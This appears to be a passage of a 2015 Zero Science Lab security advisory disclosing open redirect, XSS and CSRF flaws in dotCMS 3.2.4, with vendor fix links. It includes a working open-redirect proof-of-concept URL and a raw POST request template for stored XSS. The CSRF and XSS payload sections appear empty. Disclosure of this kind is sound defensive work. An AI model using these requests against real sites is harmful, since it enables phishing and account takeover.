otCMS 3.2.4 Multiple Vulnerabilities Vendor: dotCMS Software, LLC Product web page: http://www.dotcms.com Affected version: 3.2.4 (Enterprise) Summary: DotCMS is the next generation of Content Management System (CMS). Quick to deploy, open source, Java-based, open APIs, extensible and massively scalable, dotCMS can rapidly deliver personalized, engaging multi-channel sites, web apps, campaigns, one-pagers, intranets - all types of content driven experiences - without calling in your developers. Desc: The application suffers from multiple security vulnerabilities including: Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request Forgery (CSRF). Tested on: Apache-Coyote/1.1 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5290 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php Vendor: http://dotcms.com/docs/latest/change-log https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305 https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3 19.11.2015 -- 1. Open Redirect via '_EXT_LANG_redirect' GET parameter: -------------------------------------------------------- http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia 2. CSRF Add Admin: ------------------
3. Multiple Stored And Reflected XSS: ------------------------------------- POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1 Host: 127.0.0.1 callCount=1 windowName=c0-param0 c0-scriptName=TagAjax c0-methodName=addTag c0-id=0 c0-param0=